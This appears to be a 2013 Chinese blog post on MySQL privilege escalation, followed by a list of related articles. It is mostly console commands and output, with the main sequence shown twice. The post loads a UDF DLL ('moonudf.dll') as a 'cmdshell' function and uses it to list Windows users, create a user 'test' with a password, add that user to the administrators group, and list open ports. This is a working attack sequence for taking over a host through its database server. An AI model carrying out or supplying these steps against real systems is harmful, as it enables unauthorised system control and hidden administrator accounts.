MYSQL-提权
2013-12-03 13:41
225 查看
1、创建cmdshell: mysql> create function cmdshell returns string soname 'moonudf.dll'; ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... Connection id: 1 Current database: mysql
Query OK, 0 rows affected (0.25 sec)
2、查看用户信息: mysql> select cmdshell('net user'); +----------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------ -----------------------------------------------------------------------------+ | cmdshell('net user')
| +----------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------ -----------------------------------------------------------------------------+ | \\ 的用户帐户
------------------------------------------------------------------------------- Administrator ASPNET Guest HelpAssistant IUSR_PC-201202111331 IWAM_PC-201202111331 SUPPORT_388945a0 命令运行完毕,但发生一个或多个错误。
--------------------------------------------完成! | +----------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------ -----------------------------------------------------------------------------+ 1 row in set (0.22 sec)
3、添加用户信息: mysql> select cmdshell('net user test w321321 /add'); +-------------------------------------------------------------------------+ | cmdshell('net user test w321321 /add') | +-------------------------------------------------------------------------+ | 命令成功完成。
--------------------------------------------完成! | +-------------------------------------------------------------------------+ 1 row in set (0.36 sec)
4、添加用户到管理组:
mysql> select cmdshell('net localgroup administrators test /add '); +-------------------------------------------------------------------------+ | cmdshell('net localgroup administrators test /add ') | +-------------------------------------------------------------------------+ | 命令成功完成。
--------------------------------------------完成! | +-------------------------------------------------------------------------+ 1 row in set (0.22 sec) 测试结果:
5、查看端口: mysql> select cmdshell('netstat -an');
Query OK, 0 rows affected (0.25 sec)
2、查看用户信息: mysql> select cmdshell('net user'); +----------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------ -----------------------------------------------------------------------------+ | cmdshell('net user')
| +----------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------ -----------------------------------------------------------------------------+ | \\ 的用户帐户
------------------------------------------------------------------------------- Administrator ASPNET Guest HelpAssistant IUSR_PC-201202111331 IWAM_PC-201202111331 SUPPORT_388945a0 命令运行完毕,但发生一个或多个错误。
--------------------------------------------完成! | +----------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------ -----------------------------------------------------------------------------+ 1 row in set (0.22 sec)
3、添加用户信息: mysql> select cmdshell('net user test w321321 /add'); +-------------------------------------------------------------------------+ | cmdshell('net user test w321321 /add') | +-------------------------------------------------------------------------+ | 命令成功完成。
--------------------------------------------完成! | +-------------------------------------------------------------------------+ 1 row in set (0.36 sec)
4、添加用户到管理组:
mysql> select cmdshell('net localgroup administrators test /add '); +-------------------------------------------------------------------------+ | cmdshell('net localgroup administrators test /add ') | +-------------------------------------------------------------------------+ | 命令成功完成。
--------------------------------------------完成! | +-------------------------------------------------------------------------+ 1 row in set (0.22 sec) 测试结果:
5、查看端口: mysql> select cmdshell('netstat -an');
相关文章推荐
- 记mysql下提权不成功的一次学习
- mysql提权提示can't open shared library 'udf.dll'解决办法
- MYSQL简单提权--Mix.dll My_udf.dll(老东西,做个备份)
- 提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
- mysql之mof提权详解
- MySQL服务器提权两例
- 提权后的MYSQL密码破解
- mysql 提权等命令
- MYSQL数据库存提权总结
- mysql之mof提权详解
- MYSQL提权总结
- 转载:windows的mysql提权方式
- 提权,以MySQL之名
- Mysql提权总结
- MySQL扩展接口UDF提权
- Mysql本地提权及远程代码执行漏洞浅析(CVE-2016-6662)
- mysql提权总结方法四则
- 一次艰难的提权 MYSQL中的UDF 的研究
- MySQL提权之user.MYD中hash破解方法
- MySQL UDF提权获取主机控制权